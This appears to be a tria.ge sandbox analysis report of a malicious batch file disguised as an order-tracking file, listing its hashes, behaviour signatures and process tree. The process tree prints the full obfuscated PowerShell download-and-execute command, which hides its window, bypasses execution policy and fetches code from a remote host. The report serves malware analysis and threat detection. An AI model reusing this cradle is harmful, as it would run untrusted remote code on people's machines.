Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

11/09/2022, 02:28

220911-cxzvkaefcm 8

10/09/2022, 15:56

220910-tdcdlaach5 10

Analysis

  • max time kernel
    45s
  • max time network
    48s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    11/09/2022, 02:28

General

  • Target

    TRACK-ORDER#114-85737.bat

  • Size

    65KB

  • MD5

    44d81d1aecc0e4b0aa0f9ad726a02e99

  • SHA1

    eebf5c17f72ee3a323619f45dd1db9d03a417c37

  • SHA256

    4d634f419ee6d84324dccb8c2bbe3ed583220a676c92b1facf34bc749b4a9712

  • SHA512

    6aff752752bdc92478e336c4e71e6d77ada065a76e255e84070834bcdcca52d296cc22d7f778d1dd1cc859b31716fb5a08325977cda550d2ab5da6d490121cb2

  • SSDEEP

    192:nyj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj/:4

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\TRACK-ORDER#114-85737.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1848
    • C:\Windows\system32\cmd.exe
      CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$Whnj='IEX(NEW-OBJECT NET.W';$edKw='EBCLIENT).DOWNLO';[BYTE[]];$ARsr='TUUL(''https://surveydatabd.com/img/im.png'')'.REPLACE('TUUL','ADSTRING');[BYTE[]];IEX($Whnj+$edKw+$ARsr)
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:968
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$Whnj='IEX(NEW-OBJECT NET.W';$edKw='EBCLIENT).DOWNLO';[BYTE[]];$ARsr='TUUL(''https://surveydatabd.com/img/im.png'')'.REPLACE('TUUL','ADSTRING');[BYTE[]];IEX($Whnj+$edKw+$ARsr)
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:768

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/768-56-0x000007FEFBCA1000-0x000007FEFBCA3000-memory.dmp

    Filesize

    8KB

  • memory/768-57-0x000007FEF3710000-0x000007FEF4133000-memory.dmp

    Filesize

    10.1MB

  • memory/768-58-0x000007FEF2BB0000-0x000007FEF370D000-memory.dmp

    Filesize

    11.4MB

  • memory/768-59-0x0000000002814000-0x0000000002817000-memory.dmp

    Filesize

    12KB

  • memory/768-60-0x000000000281B000-0x000000000283A000-memory.dmp

    Filesize

    124KB

  • memory/768-61-0x0000000002814000-0x0000000002817000-memory.dmp

    Filesize

    12KB

  • memory/768-62-0x000000000281B000-0x000000000283A000-memory.dmp

    Filesize

    124KB